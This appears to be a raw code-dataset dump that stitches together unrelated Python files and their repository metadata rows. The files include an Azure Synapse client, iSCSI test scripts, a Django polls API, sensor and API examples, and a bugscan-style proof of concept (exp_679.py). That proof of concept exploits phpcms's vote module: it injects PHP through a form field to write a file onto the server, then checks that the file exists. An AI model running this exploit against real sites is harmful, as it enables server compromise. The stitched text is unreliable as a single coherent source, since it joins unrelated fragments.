def begin_delete_spark_configuration(self, spark_configuration_name: str, **kwargs: Any) -> LROPoller[None]:
"""Deletes a sparkConfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be LROBasePolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._delete_spark_configuration_initial( # type: ignore
spark_configuration_name=spark_configuration_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method: PollingMethod = cast(
PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
)
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
def _rename_spark_configuration_initial( # pylint: disable=inconsistent-return-statements
self, spark_configuration_name: str, new_name: Optional[str] = None, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[None] = kwargs.pop("cls", None)
_request = _models.ArtifactRenameRequest(new_name=new_name)
_json = self._serialize.body(_request, "ArtifactRenameRequest")
request = build_rename_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._rename_spark_configuration_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
_rename_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}/rename"}
@distributed_trace
def begin_rename_spark_configuration(
self, spark_configuration_name: str, new_name: Optional[str] = None, **kwargs: Any
) -> LROPoller[None]:
"""Renames a sparkConfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:param new_name: New name of the artifact. Default value is None.
:type new_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be LROBasePolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._rename_spark_configuration_initial( # type: ignore
spark_configuration_name=spark_configuration_name,
new_name=new_name,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method: PollingMethod = cast(
PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
)
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_rename_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}/rename"}
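    # Hypothetical caller-side sketch (not part of the generated client); the
    # operations object below is an assumption, but the method name and
    # arguments match this file:
    #
    #     poller = client.begin_rename_spark_configuration(
    #         "mySparkConfig", new_name="myRenamedSparkConfig"
    #     )
    #     poller.result()  # block until the rename LRO completes (returns None)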
| [
"[email protected]"
] | |
d1877db7913e58c396ec934ebb1dc1c993bcbbb5 | 892dd32ee0be7135cd33c875b06dcc66307dcc99 | /automation/MPTS/verifyIqn.py | b82a09a932deb898ea00bc911d3867e80a4c52da | [] | no_license | cloudbytestorage/devops | 6d21ed0afd752bdde8cefa448d4433b435493ffa | b18193b08ba3d6538277ba48253c29d6a96b0b4a | refs/heads/master | 2020-05-29T08:48:34.489204 | 2018-01-03T09:28:53 | 2018-01-03T09:28:53 | 68,889,307 | 4 | 8 | null | 2017-11-30T08:11:39 | 2016-09-22T05:53:44 | Python | UTF-8 | Python | false | false | 5,429 | py | import json
import sys
import time
from time import ctime
from cbrequest import configFile, executeCmd, executeCmdNegative, resultCollection, getoutput
config = configFile(sys.argv);
stdurl = 'https://%s/client/api?apikey=%s&response=%s&' %(config['host'], config['apikey'], config['response'])
negativeFlag = 0
if len(sys.argv)== 3:
if sys.argv[2].lower()== "negative":
negativeFlag = 1;
else:
print "Argument is not correct.. Correct way as below"
print " python verifyIqn.py config.txt"
print " python verifyIqn.py config.txt negative"
exit()
for x in range(1, int(config['Number_of_ISCSIVolumes'])+1):
startTime = ctime()
executeCmd('mkdir -p mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
### Discovery
iqnname = getoutput('iscsiadm -m discovery -t st -p %s:3260 | grep %s | awk {\'print $2\'}' %(config['voliSCSIIPAddress%d' %(x)],config['voliSCSIMountpoint%d' %(x)]))
# for negative testcase
if negativeFlag == 1:
###no iscsi volumes discovered
if iqnname==[]:
print "Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip, testcase passed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
### some iscsi volumes discovered
else:
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --login | grep Login' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
            ### iscsi volume login successful
if output[0] == "PASSED":
print "Negative testcase-iscsi volume %s login passed on the client with dummy iqn and ip, test case failed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login passed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
            ### iscsi volume login unsuccessful
else:
print "Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip, testcase passed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
# for positive testcase
else:
###no iscsi volumes discovered
if iqnname==[]:
print "iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### some iscsi volumes discovered
else:
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --login | grep Login' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
            ### iscsi volume login successful
if output[0] == "PASSED":
print "iscsi volume %s login passed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login passed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
                #### if login successful, mount and copy some data
device = getoutput('iscsiadm -m session -P3 | grep \'Attached scsi disk\' | awk {\'print $4\'}')
device2 = (device[0].split('\n'))[0]
                executeCmd('fdisk /dev/%s < fdisk_response_file' %(device2))
executeCmd('mkfs.ext3 /dev/%s1' %(device2))
executeCmd('mount /dev/%s1 mount/%s' %(device2, config['voliSCSIMountpoint%d' %(x)]))
executeCmd('cp testfile mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
output=executeCmd('diff testfile mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
if output[0] == "PASSED":
                    endTime = ctime()
                    resultCollection("Creation of File on ISCSI Volume %s passed on the client with iqn and ip credentials" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
                else:
                    endTime = ctime()
                    resultCollection("Creation of File on ISCSI Volume %s failed on the client with iqn and ip credentials" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
            ### iscsi volume login unsuccessful
else:
print "iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### logout
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --logout | grep Logout' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
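# Hypothetical config.txt contents (key names are taken from the lookups
# above; the values shown are placeholders):
#   host, apikey, response
#   Number_of_ISCSIVolumes = 1
#   voliSCSIMountpoint1, voliSCSIIPAddress1, voliSCSIDatasetname1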
| [
"[email protected]"
] | |
3fccf4fa9600a4a3e7b07d4b28660e603bcef30e | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/triangle/0296cbe043e446b8b9365e20fb75c136.py | 18e84ab880631f7510539ae77e9524b0eda2b632 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 621 | py | # represents a triangle
class Triangle(object):
_kinds=["equilateral","isosceles","scalene"]
def __init__(self,a,b,c):
if a<=0 or b<=0 or c<=0:
raise TriangleError("Triangles cannot have zero or negative side length.")
if a+b<=c or a+c<=b or b+c<=a:
raise TriangleError("Triangles must satisfy the triangle inequality.")
self.sides=sorted([a,b,c])
def kind(self):
return Triangle._kinds[len(set(self.sides))-1]
# some sort of error was encountered when constructing a Triangle
class TriangleError(Exception):
def __init__(self,message):
super(TriangleError,self).__init__(message)
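# Hypothetical usage sketch (not part of the original exercise solution):
if __name__ == "__main__":
    print(Triangle(2, 2, 2).kind())   # equilateral (1 distinct side length)
    print(Triangle(2, 2, 3).kind())   # isosceles   (2 distinct side lengths)
    print(Triangle(3, 4, 5).kind())   # scalene     (3 distinct side lengths)
    try:
        Triangle(1, 1, 3)             # violates the triangle inequality
    except TriangleError as err:
        print(err)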
| [
"[email protected]"
] | |
748f97751e80a2258b78d59ce4a378db9a54d1b5 | b743a6b89e3e7628963fd06d2928b8d1cdc3243c | /bpl_client/Client.py | c9143098c648f30df369d458d22b99d0e6d61a3a | [
"MIT"
] | permissive | DuneRoot/bpl-cli | 847248d36449181856e6cf34a18119cd9fc1b045 | 3272de85dd5e4b12ac5b2ad98bf1e971f3bf5c28 | refs/heads/master | 2020-03-25T17:42:06.339501 | 2019-02-20T19:20:26 | 2019-02-20T19:20:26 | 143,990,801 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,781 | py | """
BPL Client
Usage:
bpl-cli network config new
bpl-cli network config use
bpl-cli network config show
bpl-cli network peers
bpl-cli network status
bpl-cli account create
bpl-cli account status <address>
bpl-cli account transactions <address>
bpl-cli account send <amount> <recipient>
bpl-cli account vote <username>
bpl-cli account delegate <username>
bpl-cli message sign <message>
bpl-cli message verify <message> <publicKey>
Options:
-h --help Show this screen.
--version Show version.
Help:
For help using this client, please see https://github.com/DuneRoot/bpl-cli
"""
from importlib import import_module
from functools import reduce
from docopt import docopt
import json
from bpl_client.helpers.Constants import COMMANDS_JSON
from bpl_client.helpers.Util import read_file
from bpl_client import __version__
class Client:
def __init__(self):
"""
Client Class.
Retrieves options from docopt. Options are then filtered using data stored in commands.json.
Command is then imported and instantiated.
"""
self._options = docopt(__doc__, version=__version__)
self._arguments = {
k: v for k, v in self._options.items()
if not isinstance(v, bool)
}
commands_json = json.loads(read_file(COMMANDS_JSON))
command = list(filter(lambda x: self._is_command(x["Conditions"]), commands_json))[0]
getattr(
import_module("bpl_client.commands.{0}".format(command["Module Identifier"])),
command["Class Identifier"]
)(self._arguments).run()
def _is_command(self, conditions):
return reduce(lambda x, y: x and y, map(lambda y: self._options[y], conditions))
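    # Hypothetical commands.json entry shape assumed by _is_command() above
    # (the real file ships with the package; the key names match the lookups
    # in __init__, the values here are invented for illustration):
    #
    #     [{"Conditions": ["network", "peers"],
    #       "Module Identifier": "NetworkPeers",
    #       "Class Identifier": "NetworkPeers"}]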
| [
"[email protected]"
] | |
aa43f40b58364ba1f55d60b52c75f3e4b4bbfeb9 | 7136e5242793b620fa12e9bd15bf4d8aeb0bfe7a | /examples/adspygoogle/dfp/v201101/get_licas_by_statement.py | 9086f2f5d7006a77c1a7b578138725bf4db3479b | [
"Apache-2.0"
] | permissive | hockeyprincess/google-api-dfp-python | 534519695ffd26341204eedda7a8b50648f12ea9 | efa82a8d85cbdc90f030db9d168790c55bd8b12a | refs/heads/master | 2021-01-10T10:01:09.445419 | 2011-04-14T18:25:38 | 2011-04-14T18:25:38 | 52,676,942 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,266 | py | #!/usr/bin/python
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets all line item creative associations (LICA) for a given
line item id. The statement retrieves up to the maximum page size limit of 500.
To create LICAs, run create_licas.py."""
__author__ = '[email protected] (Stan Grinberg)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.append(os.path.join('..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle.dfp.DfpClient import DfpClient
# Initialize client object.
client = DfpClient(path=os.path.join('..', '..', '..', '..'))
# Initialize appropriate service. By default, the request is always made against
# the sandbox environment.
lica_service = client.GetLineItemCreativeAssociationService(
'https://sandbox.google.com', 'v201101')
# Set the id of the line item to get LICAs by.
line_item_id = 'INSERT_LINE_ITEM_ID_HERE'
# Create statement object to only select LICAs for the given line item id.
values = [{
'key': 'lineItemId',
'value': {
'xsi_type': 'NumberValue',
'value': line_item_id
}
}]
filter_statement = {'query': 'WHERE lineItemId = :lineItemId LIMIT 500',
'values': values}
# Get LICAs by statement.
licas = lica_service.GetLineItemCreativeAssociationsByStatement(
filter_statement)[0]['results']
# Display results.
for lica in licas:
print ('LICA with line item id \'%s\', creative id \'%s\', and status '
'\'%s\' was found.' % (lica['id'], lica['creativeId'], lica['status']))
print
print 'Number of results found: %s' % len(licas)
| [
"api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138"
] | api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138 |
405974db9681a1efc9bb65d55fa0ae64ee33d230 | 94470cf07f402b1c7824e92a852cd3203f94ac4a | /polls/apiviews.py | 6f6ca88b9da4638cbf0f4888e4305f24fa9ffee5 | [] | no_license | jbeltranleon/pollsapi_django_rest | c509bf0b0c1e2db870ed8a4aaa1647bf74c5f8cd | 0855820541064ffd77dbd1c6e77f695d4f18e517 | refs/heads/master | 2020-04-14T17:55:02.364183 | 2019-01-04T16:01:46 | 2019-01-04T16:01:46 | 163,999,126 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,203 | py | from rest_framework import generics
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.response import Response
from .models import Poll, Choice
from .serializers import PollSerializer, ChoiceSerializer,\
VoteSerializer
class PollList(generics.ListCreateAPIView):
queryset = Poll.objects.all()
serializer_class = PollSerializer
class PollDetail(generics.RetrieveDestroyAPIView):
queryset = Poll.objects.all()
serializer_class = PollSerializer
class ChoiceList(generics.ListCreateAPIView):
def get_queryset(self):
queryset = Choice.objects.filter(poll_id=self.kwargs["pk"])
return queryset
serializer_class = ChoiceSerializer
class CreateVote(APIView):
def post(self, request, pk, choice_pk):
voted_by = request.data.get("voted_by")
data = {'choice': choice_pk, 'poll': pk, 'voted_by': voted_by}
serializer = VoteSerializer(data=data)
if serializer.is_valid():
vote = serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST) | [
"[email protected]"
] | |
cdf669514aaf2c1d7c33248746135d7b0232f29f | 184ab7b1f5d6c4a4382cf4ffcf50bbad0f157ef1 | /library/aht10/aht10_example.py | 46df77a8a71666025fda1409a3c5b7ebdbed9497 | [] | no_license | RT-Thread/mpy-snippets | fdd257bb9f44cdc92e52cd39cdc88a57d736fb26 | 9296d559da275f51845cb9c2f8e2010f66f72cc1 | refs/heads/master | 2023-06-14T02:20:05.449559 | 2020-06-03T02:34:47 | 2020-06-03T02:35:19 | 198,854,793 | 28 | 18 | null | 2020-05-06T11:32:46 | 2019-07-25T15:14:56 | Python | UTF-8 | Python | false | false | 517 | py | from machine import I2C, Pin
from aht10 import AHT10
PIN_CLK = 54 # PD6, get the pin number from get_pin_number.py
PIN_SDA = 33 # PC1
clk = Pin(("clk", PIN_CLK), Pin.OUT_OD) # Select the PIN_CLK as the clock
sda = Pin(("sda", PIN_SDA), Pin.OUT_OD) # Select the PIN_SDA as the data line
i2c = I2C(-1, clk, sda, freq=100000)
sensor = AHT10(i2c)
sensor.sensor_init()
sensor.is_calibration_enabled()
print("current temp: %.2f "%sensor.read_temperature())
print("current humi: %.2f %%"%sensor.read_humidity())
| [
"[email protected]"
] | |
e2e44ffd1b8897513aaba446dd704ac14b2c5945 | 35dbd536a17d7127a1dd1c70a2903ea0a94a84c2 | /src/sentry_plugins/sessionstack/client.py | 2c50f1bafe960bbe0331c77cff05e234168642de | [
"Apache-2.0",
"BUSL-1.1"
] | permissive | nagyist/sentry | efb3ef642bd0431990ca08c8296217dabf86a3bf | d9dd4f382f96b5c4576b64cbf015db651556c18b | refs/heads/master | 2023-09-04T02:55:37.223029 | 2023-01-09T15:09:44 | 2023-01-09T15:09:44 | 48,165,782 | 0 | 0 | BSD-3-Clause | 2022-12-16T19:13:54 | 2015-12-17T09:42:42 | Python | UTF-8 | Python | false | false | 4,683 | py | import requests
from sentry.http import safe_urlopen
from sentry.utils import json
from .utils import add_query_params, get_basic_auth, remove_trailing_slashes
ACCESS_TOKEN_NAME = "Sentry"
DEFAULT_SENTRY_SOURCE = "sentry"
API_URL = "https://api.sessionstack.com"
PLAYER_URL = "https://app.sessionstack.com/player"
WEBSITES_ENDPOINT = "/v1/websites/{}"
SESSION_ENDPOINT = "/v1/websites/{}/sessions/{}"
ACCESS_TOKENS_ENDPOINT = "/v1/websites/{}/sessions/{}/access_tokens"
SESSION_URL_PATH = "/#/sessions/"
MILLISECONDS_BEFORE_EVENT = 5000
class SessionStackClient:
def __init__(self, account_email, api_token, website_id, **kwargs):
self.website_id = website_id
api_url = kwargs.get("api_url") or API_URL
self.api_url = remove_trailing_slashes(api_url)
player_url = kwargs.get("player_url") or PLAYER_URL
self.player_url = remove_trailing_slashes(player_url)
self.request_headers = {
"Authorization": get_basic_auth(account_email, api_token),
"Content-Type": "application/json",
}
def validate_api_access(self):
website_endpoint = WEBSITES_ENDPOINT.format(self.website_id)
try:
response = self._make_request(website_endpoint, "GET")
except requests.exceptions.ConnectionError:
raise InvalidApiUrlError
if response.status_code == requests.codes.UNAUTHORIZED:
raise UnauthorizedError
elif response.status_code == requests.codes.BAD_REQUEST:
raise InvalidWebsiteIdError
elif response.status_code == requests.codes.NOT_FOUND:
raise InvalidApiUrlError
response.raise_for_status()
def get_session_url(self, session_id, event_timestamp):
player_url = self.player_url + SESSION_URL_PATH + session_id
query_params = {}
query_params["source"] = DEFAULT_SENTRY_SOURCE
access_token = self._get_access_token(session_id)
if access_token is not None:
query_params["access_token"] = access_token
if event_timestamp is not None:
start_timestamp = self._get_session_start_timestamp(session_id)
if start_timestamp is not None:
pause_at = event_timestamp - start_timestamp
play_from = pause_at - MILLISECONDS_BEFORE_EVENT
query_params["pause_at"] = pause_at
query_params["play_from"] = play_from
return add_query_params(player_url, query_params)
def _get_access_token(self, session_id):
access_token = self._create_access_token(session_id)
if not access_token:
access_token = self._get_existing_access_token(session_id)
return access_token
def _get_existing_access_token(self, session_id):
response = self._make_access_tokens_request(session_id, "GET")
if response.status_code != requests.codes.OK:
return None
access_tokens = json.loads(response.content).get("data")
for token in access_tokens:
token_name = token.get("name")
if token_name == ACCESS_TOKEN_NAME:
return token.get("access_token")
return None
def _create_access_token(self, session_id):
response = self._make_access_tokens_request(
session_id=session_id, method="POST", body={"name": ACCESS_TOKEN_NAME}
)
if response.status_code != requests.codes.OK:
return None
return json.loads(response.content).get("access_token")
def _make_access_tokens_request(self, session_id, method, **kwargs):
access_tokens_endpoint = self._get_access_tokens_endpoint(session_id)
return self._make_request(access_tokens_endpoint, method, **kwargs)
def _get_access_tokens_endpoint(self, session_id):
return ACCESS_TOKENS_ENDPOINT.format(self.website_id, session_id)
def _get_session_start_timestamp(self, session_id):
endpoint = SESSION_ENDPOINT.format(self.website_id, session_id)
response = self._make_request(endpoint, "GET")
if response.status_code == requests.codes.OK:
return json.loads(response.content).get("client_start")
def _make_request(self, endpoint, method, **kwargs):
url = self.api_url + endpoint
request_kwargs = {"method": method, "headers": self.request_headers}
body = kwargs.get("body")
if body:
request_kwargs["json"] = body
return safe_urlopen(url, **request_kwargs)
class UnauthorizedError(Exception):
pass
class InvalidWebsiteIdError(Exception):
pass
class InvalidApiUrlError(Exception):
pass
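# Hypothetical usage sketch (the plugin normally constructs this client);
# the credential values below are placeholders:
#
#     client = SessionStackClient(
#         account_email="user@example.com",
#         api_token="<api-token>",
#         website_id="<website-id>",
#     )
#     client.validate_api_access()  # may raise the errors defined above
#     url = client.get_session_url(session_id, event_timestamp)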
| [
"[email protected]"
] | |
3a4928e43a8d2eb7a9e58b5e4c3c04eee176b3f5 | 0798277f2706998ab80442ac931579eb47f676e5 | /bin/metric-markdown | ed615b4e0809a60c37d486fe5df8f258f20d47d9 | [
"Apache-2.0"
] | permissive | isabella232/pulse-api-cli | 49ed38b0694ab289802f69ee6df4911cf3378e3f | b01ca65b442eed19faac309c9d62bbc3cb2c098f | refs/heads/master | 2023-03-18T00:23:15.295727 | 2016-05-13T15:44:08 | 2016-05-13T15:44:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 817 | #!/usr/bin/env python
#
# Copyright 2015 BMC Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from boundary import MetricMarkdown
"""
Reads the plugin.json manifest file, looks up the definition, and then outputs a markdown table
"""
if __name__ == "__main__":
c = MetricMarkdown()
c.execute()
| [
"[email protected]"
] | ||
95d38eb622dd57ea6cf2bba55e5202edeb6e0e3b | 43ff15a7989576712d0e51f0ed32e3a4510273c0 | /tools/pocs/bugscan/exp_679.py | 798104fb95f83ba1ff04752dfd711df064cc3623 | [] | no_license | v1cker/kekescan | f2b51d91a9d6496e2cdc767eb6a600171f513449 | 3daa1775648439ba9e0003a376f90b601820290e | refs/heads/master | 2020-09-19T16:26:56.522453 | 2017-06-15T02:55:24 | 2017-06-15T02:55:24 | 94,495,007 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,954 | py | # -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
reference:
http://www.wooyun.org/bugs/wooyun-2015-0104157
http://www.beebeeto.com/pdb/poc-2015-0086/
"""
import re
import urllib
import urllib2
import base64
import random
def get_vote_links(args):
vul_url = args
vote_url = '%sindex.php?m=vote' % vul_url
code, head, res, _, _ = curl.curl(vote_url)
ids = []
for miter in re.finditer(r'<a href=.*?subjectid=(?P<id>\d+)', res, re.DOTALL):
ids.append(miter.group('id'))
if len(ids) == 0:
return None
return list(set(ids))
def assign(service, args):
if service == 'phpcms':
return True, args
pass
def audit(args):
vul_url = args
ids = get_vote_links(args)
file_name = 'w2x5Tt_%s.php' % random.randint(1,3000)
base64_name = base64.b64encode(file_name)
if ids:
for i in ids:
exploit_url = '%sindex.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % (vul_url, i)
payload = {'subjectid': 1,
'radio[]': ');fputs(fopen(base64_decode(%s),w),"vulnerable test");' % base64_name}
post_data = urllib.urlencode(payload)
code,head,body,_,_=curl.curl('-d "%s" %s' % (post_data, exploit_url))
if code==200:
verify_url = '%sindex.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % (vul_url, i)
code,head,body,_,_=curl.curl(verify_url)
if code==200:
shell_url = '%s%s' % (vul_url, file_name)
code, head, res, _, _ = curl.curl(shell_url)
if code == 200 and 'vulnerable test' in res:
security_hole(vul_url)
if __name__ == "__main__":
from dummy import *
audit(assign('phpcms', 'http://www.jkb.com.cn/')[1]) | [
"[email protected]"
] | |
4aff36fdb71b2bbc4fd29e2773506848f06a1fd6 | 8a7d5d67052892dd5d2a748282958f6244d963c6 | /google-cloud-sdk/lib/surface/app/domain_mappings/delete.py | 32842caf145b27ecec1a4e5410e7656b9643a037 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | KisleK/capstone | 7d1d622bd5ca4cd355302778a02dc6d32ed00c88 | fcef874f4fcef4b74ca016ca7bff92677673fded | refs/heads/master | 2021-07-04T03:29:44.888340 | 2017-07-24T16:16:33 | 2017-07-24T16:16:33 | 93,699,673 | 0 | 2 | null | 2020-07-24T22:44:28 | 2017-06-08T02:34:17 | Python | UTF-8 | Python | false | false | 1,812 | py | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Surface for deleting an App Engine domain mapping."""
from googlecloudsdk.api_lib.app.api import appengine_domains_api_client as api_client
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.app import flags
from googlecloudsdk.core import log
from googlecloudsdk.core.console import console_io
class Delete(base.DeleteCommand):
"""Deletes a specified domain mapping."""
detailed_help = {
'DESCRIPTION':
'{description}',
'EXAMPLES':
"""\
To delete an App Engine domain mapping, run:
$ {command} '*.example.com'
""",
}
